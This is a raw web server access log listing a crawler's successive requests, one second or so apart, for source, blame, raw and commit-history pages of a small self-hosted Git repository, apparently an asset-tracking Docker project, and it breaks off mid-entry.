"/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/templates" [Client 74.7.227.38] [Length 10003] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker" -[17/Feb/2026:13:36:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html.good2" [Client 74.7.227.38] [Length 14692] [Gzip 4.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument" -[17/Feb/2026:13:36:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 14273] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker" -[17/Feb/2026:13:36:11 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker" -[17/Feb/2026:13:36:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/fetcher.py.claude" [Client 74.7.227.38] [Length 15512] [Gzip 9.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/fetcher.py.claude" -[17/Feb/2026:13:36:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 11872] [Gzip 4.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/Dockerfile" -[17/Feb/2026:13:36:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html" [Client 74.7.227.38] [Length 9879] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html" -[17/Feb/2026:13:36:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html" [Client 74.7.227.38] [Length 6870] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html" -[17/Feb/2026:13:36:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html" [Client 74.7.227.38] [Length 17126] [Gzip 9.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html" -[17/Feb/2026:13:36:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 859] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/Dockerfile" -[17/Feb/2026:13:36:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 259720] [Gzip 13.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/assetpilot.ico" -[17/Feb/2026:13:36:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 15450] [Gzip 8.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/claude.md" -[17/Feb/2026:13:36:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 14869] [Gzip 9.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/QUICKSTART.md" -[17/Feb/2026:13:36:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 2208] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/QUICKSTART.md" -[17/Feb/2026:13:36:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 9927] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/assetpilot.ico" -[17/Feb/2026:13:36:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 237700] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/assetpilot.ico" -[17/Feb/2026:13:36:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/QUICKSTART.md" -[17/Feb/2026:13:36:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html.good2" [Client 74.7.227.38] [Length 9886] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html.good2" -[17/Feb/2026:13:36:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 9926] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/claude.md" -[17/Feb/2026:13:36:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 5009] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/init_db.py" -[17/Feb/2026:13:36:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 9921] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/Dockerfile" -[17/Feb/2026:13:36:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/templates" [Client 74.7.227.38] [Length 9932] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/templates" -[17/Feb/2026:13:36:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 4068] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/claude.md" -[17/Feb/2026:13:36:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html.good2" [Client 74.7.227.38] [Length 5799] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html.good2" -[17/Feb/2026:13:36:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html.good2" [Client 74.7.227.38] [Length 14751] [Gzip 9.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html.good2" -[17/Feb/2026:13:36:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 15725] [Gzip 5.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/templates" -[17/Feb/2026:13:36:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 2651] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/import_csv.py" -[17/Feb/2026:13:36:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 16597] [Gzip 8.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/init_db.py" -[17/Feb/2026:13:36:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/init_db.py" -[17/Feb/2026:13:36:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 14299] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument" -[17/Feb/2026:13:36:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.gitignore" [Client 74.7.227.38] [Length 10163] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.gitignore" -[17/Feb/2026:13:36:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker" [Client 74.7.227.38] [Length 9906] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker" -[17/Feb/2026:13:36:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 15789] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument" -[17/Feb/2026:13:36:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 10483] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/requirements.txt" -[17/Feb/2026:13:36:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/fetcher.py.good" [Client 74.7.227.38] [Length 16198] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument" -[17/Feb/2026:13:36:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10864] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:13:36:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 9933] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/templates/index.html" -[17/Feb/2026:13:36:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 16389] [Gzip 9.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/templates/index.html" -[17/Feb/2026:13:36:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 5799] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/templates/index.html" -[17/Feb/2026:13:36:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 151600] [Gzip 15.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:13:36:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 18148] [Gzip 12.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_QUICKSTART.md" -[17/Feb/2026:13:36:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_QUICKSTART.md" -[17/Feb/2026:13:36:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 5252] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_QUICKSTART.md" -[17/Feb/2026:13:36:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/MIGRATION_GUIDE.md" -[17/Feb/2026:13:36:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 22878] [Gzip 13.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/MIGRATION_GUIDE.md" -[17/Feb/2026:13:36:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 7694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/MIGRATION_GUIDE.md" -[17/Feb/2026:13:36:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/fetcher.py.good" [Client 74.7.227.38] [Length 16408] [Gzip 9.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/fetcher.py.good" -[17/Feb/2026:13:36:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/fetcher.py.good" [Client 74.7.227.38] [Length 6438] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/fetcher.py.good" -[17/Feb/2026:13:36:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 13508] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker" -[17/Feb/2026:13:36:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_GUIDE.md" [Client 74.7.227.38] [Length 